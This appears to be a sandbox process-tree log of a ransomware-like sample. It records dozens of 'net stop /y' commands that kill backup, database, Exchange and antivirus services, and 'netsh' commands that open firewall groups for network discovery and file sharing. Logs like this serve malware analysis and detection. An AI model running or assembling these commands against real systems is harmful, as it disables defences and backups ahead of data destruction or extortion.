C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:3980
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ESHASRV /y2⤵PID:4104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ESHASRV /y3⤵PID:4176
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:4116
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y3⤵PID:4200
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SDRSVC /y2⤵PID:4224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SDRSVC /y3⤵PID:4304
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPS /y2⤵PID:4256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y3⤵PID:4320
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:4348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y3⤵PID:4424
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EPUpdateService /y2⤵PID:4388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y3⤵PID:4456
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop FA_Scheduler /y2⤵PID:4476
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y3⤵PID:4544
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ntrtscan /y2⤵PID:4508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y3⤵PID:4576
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:4596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:4668
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵PID:4620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y3⤵PID:4684
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EsgShKernel /y2⤵PID:4732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y3⤵PID:4796
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y2⤵PID:4708
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y3⤵PID:4772
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFS /y2⤵PID:4812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFS /y3⤵PID:4868
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBrokerSvc /y2⤵PID:4836
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y3⤵PID:4900
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵PID:4928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:5036
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLWriter /y2⤵PID:4916
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y3⤵PID:4996
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SQL_2008 /y2⤵PID:5020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y3⤵PID:5108
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y2⤵PID:5064
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y3⤵PID:1676
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:2788
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:3088
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop klnagent /y2⤵PID:3408
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop klnagent /y3⤵PID:1872
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop KAVFSGT /y2⤵PID:3928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop KAVFSGT /y3⤵PID:3632
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵PID:2492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:4184
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:4180
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:4332
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:4104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:4248
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamBackupSvc /y2⤵PID:4216
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y3⤵PID:4284
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵PID:4264
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y3⤵PID:4404
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:4260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:4376
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:4408
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:4592
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵PID:4468
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:4512
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:4584
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y3⤵PID:4696
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y2⤵PID:4392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y3⤵PID:4644
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵PID:4636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:4824
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop kavfsslp /y2⤵PID:4652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop kavfsslp /y3⤵PID:3656
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵PID:4664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:4740
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop macmnsvc /y2⤵PID:4768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y3⤵PID:2692
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵PID:3384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:4864
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵PID:4868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:5008
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵PID:2364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper /y3⤵PID:5076
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamCloudSvc /y2⤵PID:4860
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCloudSvc /y3⤵PID:4988
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:4932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:2108
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:4976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:4132
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵PID:5080
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y3⤵PID:652
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeEngineService /y2⤵PID:5028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y3⤵PID:3900
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:2604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵
- Suspicious use of WriteProcessMemory
PID:1016
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:1348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:4112
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop masvc /y2⤵PID:2688
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y3⤵PID:4228
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵PID:2784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y3⤵PID:4120
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:4356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:4232
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:2156
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:4200
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:4540
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵PID:4372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y3⤵PID:4312
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:4196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:4280
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:4488
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:4500
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFramework /y2⤵PID:4492
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y3⤵PID:4676
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:4400
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:4704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:4608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y4⤵PID:4700
-
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵PID:4612
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y3⤵PID:4884
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamMountSvc /y2⤵PID:2692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y3⤵PID:4816
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:3656
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:2412
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBAMService /y2⤵PID:4712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y3⤵PID:5040
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:4944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:4872
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:5052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:5096
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:5036
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:4132
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵PID:4840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y3⤵PID:652
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploySvc /y2⤵PID:4020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploySvc /y3⤵PID:2156
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:3864
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:4192
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:1140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:3664
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:4208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y3⤵PID:4236
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQLSERVER /y2⤵PID:2772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y3⤵PID:2740
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:4228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:4428
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:4284
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of WriteProcessMemory
PID:3632
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:4456
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:4532
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:4588
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵PID:4272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Enterprise Client Service” /y3⤵PID:4676
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MBEndpointAgent /y2⤵PID:4592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y3⤵PID:4684
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:4416
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:4808
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL57 /y2⤵PID:4572
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL57 /y3⤵PID:4624
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQL Backups /y2⤵PID:4528
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y3⤵PID:4660
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵PID:4560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y3⤵PID:4864
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McShield /y2⤵PID:748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y3⤵PID:4964
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:5004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:3088
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer100 /y2⤵PID:5012
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer100 /y3⤵PID:4896
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfefire /y2⤵PID:3748
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfefire /y3⤵PID:1840
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamRESTSvc /y2⤵PID:192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y3⤵PID:4584
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetMsmqActivator /y2⤵PID:5060
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetMsmqActivator /y3⤵PID:2788
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:4968
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:4868
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵PID:4260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:2692
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MySQL80 /y2⤵PID:4704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y3⤵PID:652
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeIS /y2⤵PID:4392
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y3⤵PID:3972
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:4348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:5112
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:360
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:2152
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y3⤵PID:3456
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McTaskManager /y2⤵PID:692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y3⤵PID:4340
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵PID:1556
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y3⤵PID:4268
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:4252
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:4336
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfemms /y2⤵PID:2740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y3⤵PID:4456
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SamSs /y2⤵PID:4240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SamSs /y3⤵PID:4320
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:4448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:4684
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:4680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:4884
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop wbengine /y2⤵PID:4396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y3⤵PID:4660
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer /y2⤵PID:4756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y3⤵PID:4548
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop OracleClientCache80 /y2⤵PID:4496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y3⤵PID:3364
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵PID:4380
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Backup Service” /y3⤵PID:4752
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RESvc /y2⤵PID:4632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y3⤵PID:4736
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:4940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵PID:4848
-
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:4744
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer110 /y2⤵PID:4732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y3⤵PID:3384
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfevtp /y2⤵PID:4388
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y3⤵PID:2688
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sophos /y2⤵PID:4820
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:4712
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵PID:5056
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y3⤵PID:4476
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop POP3Svc /y2⤵PID:4900
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y3⤵PID:4904
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵PID:4432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Acronis VSS Provider” /y3⤵PID:4196
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sms_site_sql_backup /y2⤵PID:4928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y3⤵PID:4860
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SepMasterService /y2⤵PID:4172
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y3⤵PID:4652
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MsDtsServer /y2⤵PID:4912
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y3⤵PID:3000
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeMGMT /y2⤵PID:3828
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y3⤵PID:4328
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵PID:4444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y3⤵PID:3112
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵PID:3464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y3⤵PID:4404
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop IISAdmin /y2⤵PID:2976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y3⤵PID:4624
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵PID:4168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y3⤵PID:4352
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵PID:4316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y3⤵PID:4600
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ShMonitor /y2⤵PID:4684
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3904
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y3⤵PID:4312
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SMTPSvc /y2⤵PID:4436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y3⤵PID:5104
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop MSExchangeES /y2⤵PID:4920
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeES /y3⤵PID:4656
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:4668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y3⤵PID:4776
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROD /y2⤵PID:4412
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y3⤵PID:2600
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “Sophos Agent” /y2⤵PID:4996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Agent” /y3⤵PID:3684
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop sacsvr /y2⤵PID:4544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y3⤵PID:4992
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Smcinst /y2⤵PID:4724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y3⤵PID:3032
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop EraserSvc11710 /y2⤵PID:4944
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y3⤵PID:5020
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:4608
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵PID:4196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “SQLsafe Filter Service” /y3⤵PID:4488
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:4904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y3⤵PID:4144
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵PID:4508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CXDB /y3⤵PID:4860
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop msftesql$PROD /y2⤵PID:1348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msftesql$PROD /y3⤵PID:3892
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SmcService /y2⤵PID:4304
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y3⤵PID:4140
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SAVAdminService /y2⤵PID:1928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y3⤵PID:4540
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵PID:1272
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y3⤵PID:4176
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SstpSvc /y2⤵PID:4676
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y3⤵PID:4444
-
-
-
